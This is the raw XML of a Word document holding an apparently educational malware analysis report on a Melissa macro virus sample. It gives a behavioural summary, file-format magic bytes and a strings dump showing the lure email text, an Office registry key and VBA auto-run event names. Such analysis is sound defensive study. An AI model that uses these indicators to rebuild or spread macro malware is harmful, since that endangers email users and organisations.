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3D696" w14:textId="77777777" w:rsidR="00D203C7" w:rsidRDefault="00D203C7" w:rsidP="0054426F">
      <w:r>
        <w:t xml:space="preserve">Malware </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Analysis </w:t>
      </w:r>
      <w:r>
        <w:t>: Filename: sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D25EF7" w14:textId="7E91D915" w:rsidR="00D203C7" w:rsidRDefault="00D203C7" w:rsidP="0054426F">
      <w:r>
        <w:t xml:space="preserve">Type of the file: MS Word Document </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915B381" w14:textId="17E38CB9" w:rsidR="00D203C7" w:rsidRPr="00D203C7" w:rsidRDefault="00D203C7" w:rsidP="0054426F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D203C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What file do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376315AF" w14:textId="1C4940CD" w:rsidR="00D203C7" w:rsidRDefault="00D203C7" w:rsidP="0054426F">
      <w:r>
        <w:t xml:space="preserve">The Melissa virus refers to a computer macro virus that can infect computers and email gateways, when users run Microsoft Word 97 or 2000, or Microsoft Outlook 97 or 98. Usenet groups first received the virus, created by David L. Smith, in the late 1990s. By the end of the 1990s, some users and mail clients were shut down by the clogged replicated emails being sent and received by infected computers. Companies like Lucent, Microsoft and Intel all had to temporarily shut down their email servers because the virus was generating huge amounts of dummy emails and clogging the system. The virus has several forms and may infect a computer is the following manner: 1. The virus comes in .DOC formation, and attempts to replicate and send itself to other computers via email addresses on the computer. 2. A variant of the virus does the above and also attempts to delete files. 3. The user receives an email titled “My Pictures” which is blank but contains an attached file. When opened, it deletes data and sends itself to the first 40 entries in a person’s email address list. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147C92C" w14:textId="79FD6882" w:rsidR="00D203C7" w:rsidRDefault="00D203C7" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099F4707" wp14:editId="45B04F6B">
            <wp:extent cx="5731510" cy="10782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078230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="125644BA" w14:textId="77777777" w:rsidR="00D203C7" w:rsidRDefault="00D203C7" w:rsidP="0054426F"/>
    <w:p w14:paraId="3179DA60" w14:textId="6F43AD25" w:rsidR="00925F4A" w:rsidRDefault="00D203C7" w:rsidP="0054426F">
      <w:r>
        <w:t xml:space="preserve">Static Analysis: </w:t>
      </w:r>
      <w:r w:rsidR="0054426F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="042FE216" wp14:editId="24D4AD32">
            <wp:extent cx="5731510" cy="3147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7695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74982EAD" w14:textId="0D4392DE" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F"/>
    <w:p w14:paraId="74661767" w14:textId="2A71CBF0" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="427B6381" wp14:editId="32F2DF6B">
            <wp:extent cx="5731510" cy="2381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81885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA97546" w14:textId="5BC975AF" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F"/>
    <w:p w14:paraId="5AB49A2E" w14:textId="6CF311E5" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F68DCA" wp14:editId="0C928B34">
            <wp:extent cx="5731510" cy="2339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9340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44026D63" w14:textId="3A37FC79" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2077483F" wp14:editId="03FDC9EB">
            <wp:extent cx="5731510" cy="32715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1520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD83B7" w14:textId="5EBB8EBC" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F"/>
    <w:p w14:paraId="5C5FAA39" w14:textId="7A702A2C" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="048CEB5A" wp14:editId="273D6C4A">
            <wp:extent cx="5731510" cy="33089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08985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0ECB47" w14:textId="59365587" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F"/>
    <w:p w14:paraId="147C10EF" w14:textId="63EFD7F3" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F05E4C6" wp14:editId="119388B2">
            <wp:extent cx="5731510" cy="24072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7285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C6377" w14:textId="4CDC576E" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27843264" wp14:editId="02853F5C">
            <wp:extent cx="5731510" cy="25025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02535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12FAD8" w14:textId="3CFBFE8C" w:rsidR="0054426F" w:rsidRDefault="0054426F" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0027A019" wp14:editId="202296BE">
            <wp:extent cx="5731510" cy="24485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8560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6110CF" w14:textId="68F819AF" w:rsidR="006C084D" w:rsidRDefault="006C084D" w:rsidP="0054426F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10FE3754" wp14:editId="1B5D5DAB">
            <wp:extent cx="5731510" cy="36893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89350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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50"/>
        <w:gridCol w:w="1223"/>
        <w:gridCol w:w="309"/>
        <w:gridCol w:w="589"/>
        <w:gridCol w:w="5639"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F7786" w:rsidRPr="005F7786" w14:paraId="74FC99BF" w14:textId="77777777" w:rsidTr="005F778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75AAB" w14:textId="77777777" w:rsidR="005F7786" w:rsidRPr="005F7786" w:rsidRDefault="005F7786" w:rsidP="005F7786">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="single" w:sz="6" w:space="1" w:color="EAECF0" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>D0 CF 11 E0 A1 B1 1A E1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6E1B2D" w14:textId="77777777" w:rsidR="005F7786" w:rsidRPr="005F7786" w:rsidRDefault="005F7786" w:rsidP="005F7786">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="single" w:sz="6" w:space="1" w:color="EAECF0" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ÐÏ␑à¡±␚á</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156B01" w14:textId="77777777" w:rsidR="005F7786" w:rsidRPr="005F7786" w:rsidRDefault="005F7786" w:rsidP="005F7786">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="2021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B70784" w14:textId="77777777" w:rsidR="005F7786" w:rsidRPr="005F7786" w:rsidRDefault="005F7786" w:rsidP="005F7786">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>doc</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:br/>
              <w:t>xls</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:br/>
              <w:t>ppt</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:br/>
              <w:t>msg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A81A0F" w14:textId="77777777" w:rsidR="005F7786" w:rsidRPr="005F7786" w:rsidRDefault="00D203C7" w:rsidP="005F7786">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:tooltip="Compound File Binary Format" w:history="1">
              <w:r w:rsidR="005F7786" w:rsidRPr="005F7786">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="0645AD"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-IN"/>
                </w:rPr>
                <w:t>Compound File Binary Format</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="005F7786" w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>, a container format used for document by older versions of </w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:tooltip="Microsoft Office" w:history="1">
              <w:r w:rsidR="005F7786" w:rsidRPr="005F7786">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="0645AD"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-IN"/>
                </w:rPr>
                <w:t>Microsoft Office</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="005F7786" w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:anchor="cite_note-27" w:history="1">
              <w:r w:rsidR="005F7786" w:rsidRPr="005F7786">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="0645AD"/>
                  <w:sz w:val="17"/>
                  <w:szCs w:val="17"/>
                  <w:u w:val="single"/>
                  <w:vertAlign w:val="superscript"/>
                  <w:lang w:eastAsia="en-IN"/>
                </w:rPr>
                <w:t>[27]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="005F7786" w:rsidRPr="005F7786">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="202122"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t> It is however an open format used by other programs as well.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35719FCD" w14:textId="77777777" w:rsidR="006C084D" w:rsidRDefault="006C084D" w:rsidP="0054426F"/>
    <w:p w14:paraId="6823D2E9" w14:textId="77777777" w:rsidR="006C084D" w:rsidRDefault="006C084D" w:rsidP="0054426F"/>
    <w:p w14:paraId="77EC2F02" w14:textId="77777777" w:rsidR="006C084D" w:rsidRDefault="006C084D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="405885E9" w14:textId="415F166D" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="0054426F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Strings :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700FBAAF" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2679CC4E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F8236" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67531C18" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A69B3AF" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Important Message From</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F4127" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Here is that document you asked for ... don't show anyone else ;-)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E134351" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440A6593" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE788A6" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>men</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167236C0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>nfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB338D" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E56CDB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>... by Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DF615" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Office\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D266C61" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56189C87" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939D857" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D274C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E495018" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D929F7B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD07B4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D4BF2" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Melissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F76EA9" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D2AE0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Private Sub Document_Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42B947" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>B@|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAB3D5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Private Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961C073" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Document~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36210652" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Document~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC4C16" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>WORD/Melissa written by Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFA8BC" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Works in both Word 2000 and Word 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8E560" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31846CBE" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C78D5" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t xml:space="preserve"> Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C46BFA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Attribut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F458A" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>e VB_Nam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB924E" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>e = "Mel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B885A3" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>issa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBAD1C" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Bas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225CDE6B" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>x1Nor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCD8124" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>mal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E02CD9" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Cre atabl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58257AD0" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>VFa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E572AD" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D2D03" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Pred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064C7F3" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ecla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0557727F" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Tru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D034FA" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>"Expo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D0F31" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>Templ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8CC9BB" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ateDeriv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1623D963" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>$Customi6z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78576542" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>8 S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD47AF4" w14:textId="77777777" w:rsidR="007F0128" w:rsidRDefault="007F0128" w:rsidP="007F0128">
      <w:r>
        <w:t>ub Docum</w:t>
